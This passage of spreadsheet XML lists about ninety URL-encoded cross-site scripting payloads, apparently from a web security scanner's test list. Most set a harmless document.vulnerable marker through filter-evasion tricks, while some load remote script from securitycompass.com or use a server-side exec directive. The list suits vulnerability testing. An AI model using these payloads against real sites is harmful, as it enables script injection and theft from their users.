      <c r="A2242" s="3" t="s">
        <v>1263</v>
      </c>
      <c r="B2242" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Ftitle%3E%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2243">
      <c r="A2243" s="3" t="s">
        <v>1264</v>
      </c>
      <c r="B2243" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2244">
      <c r="A2244" s="3" t="s">
        <v>1265</v>
      </c>
      <c r="B2244" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20BACKGROUND%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2245">
      <c r="A2245" s="3" t="s">
        <v>1266</v>
      </c>
      <c r="B2245" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20ONLOAD%3Ddocument.vulnerable%3Dtrue%3B%3E</v>
      </c>
    </row>
    <row r="2246">
      <c r="A2246" s="3" t="s">
        <v>1267</v>
      </c>
      <c r="B2246" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20DYNSRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2247">
      <c r="A2247" s="3" t="s">
        <v>1268</v>
      </c>
      <c r="B2247" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20LOWSRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2248">
      <c r="A2248" s="3" t="s">
        <v>1269</v>
      </c>
      <c r="B2248" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbgsound%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2249">
      <c r="A2249" s="3" t="s">
        <v>1270</v>
      </c>
      <c r="B2249" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbr%20SIZE%3D%22%26%7Bdocument.vulnerable%3Dtrue%7D%22%3E</v>
      </c>
    </row>
    <row r="2250">
      <c r="A2250" s="3" t="s">
        <v>1271</v>
      </c>
      <c r="B2250" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLAYER%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E%3C%2FLAYER%3E</v>
      </c>
    </row>
    <row r="2251">
      <c r="A2251" s="3" t="s">
        <v>1272</v>
      </c>
      <c r="B2251" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Clink%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2252">
      <c r="A2252" s="3" t="s">
        <v>1273</v>
      </c>
      <c r="B2252" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%29%3B%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS</v>
      </c>
    </row>
    <row r="2253">
      <c r="A2253" s="3" t="s">
        <v>1274</v>
      </c>
      <c r="B2253" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%27vbscript%3Adocument.vulnerable%3Dtrue%3B%27%3E</v>
      </c>
    </row>
    <row r="2254">
      <c r="A2254" s="3" t="s">
        <v>1275</v>
      </c>
      <c r="B2254" s="4" t="str">
        <f t="shared" si="1"/>
        <v>1script3document.vulnerable%3Dtrue%3B1%2Fscript3</v>
      </c>
    </row>
    <row r="2255">
      <c r="A2255" s="3" t="s">
        <v>1276</v>
      </c>
      <c r="B2255" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2256">
      <c r="A2256" s="3" t="s">
        <v>1277</v>
      </c>
      <c r="B2256" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2257">
      <c r="A2257" s="3" t="s">
        <v>1278</v>
      </c>
      <c r="B2257" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="2258">
      <c r="A2258" s="3" t="s">
        <v>1279</v>
      </c>
      <c r="B2258" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E%3C%2Fframeset%3E</v>
      </c>
    </row>
    <row r="2259">
      <c r="A2259" s="3" t="s">
        <v>1280</v>
      </c>
      <c r="B2259" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctable%20BACKGROUND%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2260">
      <c r="A2260" s="3" t="s">
        <v>1281</v>
      </c>
      <c r="B2260" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctable%3E%3CTD%20BACKGROUND%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2261">
      <c r="A2261" s="3" t="s">
        <v>1282</v>
      </c>
      <c r="B2261" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20STYLE%3D%22background-image%3A%20url%28javascript%3Adocument.vulnerable%3Dtrue%3B%29%22%3E</v>
      </c>
    </row>
    <row r="2262">
      <c r="A2262" s="3" t="s">
        <v>1283</v>
      </c>
      <c r="B2262" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20STYLE%3D%22background-image%3A%20url%28%26%231%3Bjavascript%3Adocument.vulnerable%3Dtrue%3B%29%22%3E</v>
      </c>
    </row>
    <row r="2263">
      <c r="A2263" s="3" t="s">
        <v>1284</v>
      </c>
      <c r="B2263" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20STYLE%3D%22width%3A%20expression%28document.vulnerable%3Dtrue%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2264">
      <c r="A2264" s="3" t="s">
        <v>1285</v>
      </c>
      <c r="B2264" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Adocument.vulnerable%3Dtrue%27%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2265">
      <c r="A2265" s="3" t="s">
        <v>1286</v>
      </c>
      <c r="B2265" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28document.vulnerable%3Dtrue%29%22%3E</v>
      </c>
    </row>
    <row r="2266">
      <c r="A2266" s="3" t="s">
        <v>1287</v>
      </c>
      <c r="B2266" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28document.vulnerable%3Dtrue%29%22%3E</v>
      </c>
    </row>
    <row r="2267">
      <c r="A2267" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="B2267" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%3CA%20STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3Bxss%3Aex%2F%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28document.vulnerable%3Dtrue%29%27%3E</v>
      </c>
    </row>
    <row r="2268">
      <c r="A2268" s="3" t="s">
        <v>1289</v>
      </c>
      <c r="B2268" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20TYPE%3D%22text%2Fjavascript%22%3Edocument.vulnerable%3Dtrue%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2269">
      <c r="A2269" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="B2269" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Adocument.vulnerable%3Dtrue%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="2270">
      <c r="A2270" s="3" t="s">
        <v>1291</v>
      </c>
      <c r="B2270" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Adocument.vulnerable%3Dtrue%22%29%7D%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2271">
      <c r="A2271" s="3" t="s">
        <v>1292</v>
      </c>
      <c r="B2271" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%20gte%20IE%204%5D%3E%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3B%3C%2FSCRIPT%3E%3C%21%5Bendif%5D--%3E</v>
      </c>
    </row>
    <row r="2272">
      <c r="A2272" s="3" t="s">
        <v>1293</v>
      </c>
      <c r="B2272" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbase%20HREF%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="2273">
      <c r="A2273" s="3" t="s">
        <v>1294</v>
      </c>
      <c r="B2273" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name%3Durl%20value%3Djavascript%3Adocument.vulnerable%3Dtrue%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="2274">
      <c r="A2274" s="3" t="s">
        <v>1295</v>
      </c>
      <c r="B2274" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5Bcript%3Adocument.vulnerable%3Dtrue%3B%22%3E%5D%5D%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN%20DATASRC%3D%23I%20DATAFLD%3DC%20DATAFORMATAS%3DHTML%3E%3C%2Fspan%3E</v>
      </c>
    </row>
    <row r="2275">
      <c r="A2275" s="3" t="s">
        <v>1296</v>
      </c>
      <c r="B2275" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXML%20ID%3D%22xss%22%3E%3CI%3E%3CB%3E%3CIMG%20SRC%3D%22javas%3C%21--%20--%3Ecript%3Adocument.vulnerable%3Dtrue%22%3E%3C%2FB%3E%3C%2FI%3E%3C%2FXML%3E%3CSPAN%20DATASRC%3D%22%23xss%22%20DATAFLD%3D%22B%22%20DATAFORMATAS%3D%22HTML%22%3E%3C%2Fspan%3E</v>
      </c>
    </row>
    <row r="2276">
      <c r="A2276" s="3" t="s">
        <v>1297</v>
      </c>
      <c r="B2276" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%3E%3CBODY%3E%3C%3Fxml%3Anamespace%20prefix%3D%22t%22%20ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E%3C%3Fimport%20namespace%3D%22t%22%20implementation%3D%22%23default%23time2%22%3E%3Ct%3Aset%20attributeName%3D%22innerHTML%22%20to%3D%22XSS%3CSCRIPT%20DEFER%3Edocument.vulnerable%3Dtrue%3C%2FSCRIPT%3E%22%3E%3C%2FBODY%3E%3C%2Fhtml%3E</v>
      </c>
    </row>
    <row r="2277">
      <c r="A2277" s="3" t="s">
        <v>1298</v>
      </c>
      <c r="B2277" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20echo%28%27%3CSCR%29%27%3Becho%28%27IPT%3Edocument.vulnerable%3Dtrue%3C%2FSCRIPT%3E%27%29%3B%20%3F%3E</v>
      </c>
    </row>
    <row r="2278">
      <c r="A2278" s="3" t="s">
        <v>1299</v>
      </c>
      <c r="B2278" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22Set-Cookie%22%20Content%3D%22USERID%3D%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="2279">
      <c r="A2279" s="3" t="s">
        <v>1300</v>
      </c>
      <c r="B2279" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chead%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-document.vulnerable%3Dtrue%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="2280">
      <c r="A2280" s="3" t="s">
        <v>1301</v>
      </c>
      <c r="B2280" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%23document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2281">
      <c r="A2281" s="3" t="s">
        <v>1302</v>
      </c>
      <c r="B2281" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20onmouseover%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2282">
      <c r="A2282" s="3" t="s">
        <v>1303</v>
      </c>
      <c r="B2282" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2283">
      <c r="A2283" s="3" t="s">
        <v>1304</v>
      </c>
      <c r="B2283" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20dynsrc%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2284">
      <c r="A2284" s="3" t="s">
        <v>1305</v>
      </c>
      <c r="B2284" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20type%3D%22image%22%20dynsrc%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2285">
      <c r="A2285" s="3" t="s">
        <v>1306</v>
      </c>
      <c r="B2285" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbgsound%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2286">
      <c r="A2286" s="3" t="s">
        <v>1307</v>
      </c>
      <c r="B2286" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2287">
      <c r="A2287" s="3" t="s">
        <v>1308</v>
      </c>
      <c r="B2287" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%7Bdocument.vulnerable%3Dtrue%3B%7D%3B</v>
      </c>
    </row>
    <row r="2288">
      <c r="A2288" s="3" t="s">
        <v>1309</v>
      </c>
      <c r="B2288" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%26%7Bdocument.vulnerable%3Dtrue%3B%7D%3B%3E</v>
      </c>
    </row>
    <row r="2289">
      <c r="A2289" s="3" t="s">
        <v>1310</v>
      </c>
      <c r="B2289" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Clink%20rel%3D%22stylesheet%22%20href%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2290">
      <c r="A2290" s="3" t="s">
        <v>1311</v>
      </c>
      <c r="B2290" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22vbscript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2291">
      <c r="A2291" s="3" t="s">
        <v>1312</v>
      </c>
      <c r="B2291" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22mocha%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2292">
      <c r="A2292" s="3" t="s">
        <v>1313</v>
      </c>
      <c r="B2292" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22livescript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2293">
      <c r="A2293" s="3" t="s">
        <v>1314</v>
      </c>
      <c r="B2293" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22about%3A%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="2294">
      <c r="A2294" s="3" t="s">
        <v>1315</v>
      </c>
      <c r="B2294" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2295">
      <c r="A2295" s="3" t="s">
        <v>1316</v>
      </c>
      <c r="B2295" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onload%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2296">
      <c r="A2296" s="3" t="s">
        <v>1317</v>
      </c>
      <c r="B2296" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22background-image%3A%20url%28javascript%3Adocument.vulnerable%3Dtrue%3B%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2297">
      <c r="A2297" s="3" t="s">
        <v>1318</v>
      </c>
      <c r="B2297" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22behaviour%3A%20url%28%5Blink%20to%20code%5D%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2298">
      <c r="A2298" s="3" t="s">
        <v>1319</v>
      </c>
      <c r="B2298" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22binding%3A%20url%28%5Blink%20to%20code%5D%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2299">
      <c r="A2299" s="3" t="s">
        <v>1320</v>
      </c>
      <c r="B2299" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22width%3A%20expression%28document.vulnerable%3Dtrue%3B%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2300">
      <c r="A2300" s="3" t="s">
        <v>1321</v>
      </c>
      <c r="B2300" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20type%3D%22text%2Fjavascript%22%3Edocument.vulnerable%3Dtrue%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2301">
      <c r="A2301" s="3" t="s">
        <v>1322</v>
      </c>
      <c r="B2301" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20classid%3D%22clsid%3A...%22%20codebase%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2302">
      <c r="A2302" s="3" t="s">
        <v>1323</v>
      </c>
      <c r="B2302" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%21--%3C%2Fstyle%3E%3Cscript%3Edocument.vulnerable%3Dtrue%3B%2F%2F--%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2303">
      <c r="A2303" s="3" t="s">
        <v>1324</v>
      </c>
      <c r="B2303" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2304">
      <c r="A2304" s="3" t="s">
        <v>1325</v>
      </c>
      <c r="B2304" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%5B%3C%21--%5D%5D%3Cscript%3Edocument.vulnerable%3Dtrue%3B%2F%2F--%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2305">
      <c r="A2305" s="3" t="s">
        <v>1326</v>
      </c>
      <c r="B2305" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%20--%20--%3E%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E%3C%21--%20--%20--%3E</v>
      </c>
    </row>
    <row r="2306">
      <c r="A2306" s="3" t="s">
        <v>1327</v>
      </c>
      <c r="B2306" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22blah%22onmouseover%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2307">
      <c r="A2307" s="3" t="s">
        <v>1328</v>
      </c>
      <c r="B2307" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22blah%3E%22%20onmouseover%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2308">
      <c r="A2308" s="3" t="s">
        <v>1329</v>
      </c>
      <c r="B2308" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2309">
      <c r="A2309" s="3" t="s">
        <v>1330</v>
      </c>
      <c r="B2309" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20id%3D%22X%22%3E%3Ca%3E%3Cb%3E%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E%3B%3C%2Fb%3E%3C%2Fa%3E%3C%2Fxml%3E</v>
      </c>
    </row>
    <row r="2310">
      <c r="A2310" s="3" t="s">
        <v>1331</v>
      </c>
      <c r="B2310" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20datafld%3D%22b%22%20dataformatas%3D%22html%22%20datasrc%3D%22%23X%22%3E%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="2311">
      <c r="A2311" s="3" t="s">
        <v>1332</v>
      </c>
      <c r="B2311" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5B%5CxC0%5D%5B%5CxBC%5Dscript%3Edocument.vulnerable%3Dtrue%3B%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E</v>
      </c>
    </row>
    <row r="2312">
      <c r="A2312" s="3" t="s">
        <v>1333</v>
      </c>
      <c r="B2312" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40import%27http%3A%2F%2Fwww.securitycompass.com%2Fxss.css%27%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2313">
      <c r="A2313" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="B2313" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3Chttp%3A%2F%2Fwww.securitycompass.com%2Fxss.css%3E%3B%20REL%3Dstylesheet%22%3E</v>
      </c>
    </row>
    <row r="2314">
      <c r="A2314" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="B2314" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fwww.securitycompass.com%2Fxssmoz.xml%23xss%22%29%7D%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2315">
      <c r="A2315" s="3" t="s">
        <v>1336</v>
      </c>
      <c r="B2315" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fscriptlet.html%22%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="2316">
      <c r="A2316" s="3" t="s">
        <v>1337</v>
      </c>
      <c r="B2316" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHTML%20xmlns%3Axss%3E%3C%3Fimport%20namespace%3D%22xss%22%20implementation%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.htc%22%3E%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E%3C%2Fhtml%3E</v>
      </c>
    </row>
    <row r="2317">
      <c r="A2317" s="3" t="s">
        <v>1338</v>
      </c>
      <c r="B2317" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.jpg%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2318">
      <c r="A2318" s="3" t="s">
        <v>1339</v>
      </c>
      <c r="B2318" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27%3CSCR%27%22--%3E%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27IPT%20SRC%3Dhttp%3A%2F%2Fwww.securitycompass.com%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E</v>
      </c>
    </row>
    <row r="2319">
      <c r="A2319" s="3" t="s">
        <v>1340</v>
      </c>
      <c r="B2319" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2320">
      <c r="A2320" s="3" t="s">
        <v>1341</v>
      </c>
      <c r="B2320" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2321">
      <c r="A2321" s="3" t="s">
        <v>1342</v>
      </c>
      <c r="B2321" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%22%3E%22%20%27%27%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2322">
      <c r="A2322" s="3" t="s">
        <v>1343</v>
      </c>
      <c r="B2322" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%22a%3D%27%3E%27%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2323">
      <c r="A2323" s="3" t="s">
        <v>1344</v>
      </c>
      <c r="B2323" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%60%3E%60%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2324">
      <c r="A2324" s="3" t="s">
        <v>1345</v>
      </c>
      <c r="B2324" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%22%3E%27%3E%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2325">
      <c r="A2325" s="3" t="s">
        <v>1346</v>
      </c>
      <c r="B2325" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2326">
      <c r="A2326" s="3" t="s">
        <v>1347</v>
      </c>
      <c r="B2326" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22binding%3A%20url%28http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%29%3B%22%3E%20%5BMozilla%5D</v>
      </c>
    </row>
    <row r="2327">
      <c r="A2327" s="3" t="s">
        <v>1348</v>
      </c>
      <c r="B2327" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26quot%3B%26gt%3B%26lt%3BBODY%20onload%21%23%24%25%26amp%3B%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%26quot%3BXSS%26quot%3B%29%26gt%3B</v>
      </c>
    </row>
    <row r="2328">
      <c r="A2328" s="3" t="s">
        <v>1349</v>
      </c>
      <c r="B2328" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%2Fscript%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B</v>
      </c>
    </row>
    <row r="2329">
      <c r="A2329" s="3" t="s">
        <v>1350</v>
      </c>
      <c r="B2329" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%2Fbr%20style%3Da%3Aexpression%28alert%28%29%29%26gt%3B</v>
      </c>
    </row>
    <row r="2330">
      <c r="A2330" s="3" t="s">
        <v>1351</v>
      </c>
      <c r="B2330" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3Bscrscriptipt%26gt%3Balert%281%29%26lt%3B%2Fscrscriptipt%26gt%3B</v>
      </c>
    </row>
    <row r="2331">
      <c r="A2331" s="3" t="s">
        <v>1352</v>
      </c>
      <c r="B2331" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3Bbr%20size%3D%5C%26quot%3B%26amp%3B%7Balert%28%26%23039%3BXSS%26%23039%3B%29%7D%5C%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2332">
      <c r="A2332" s="3" t="s">
        <v>1353</v>
      </c>
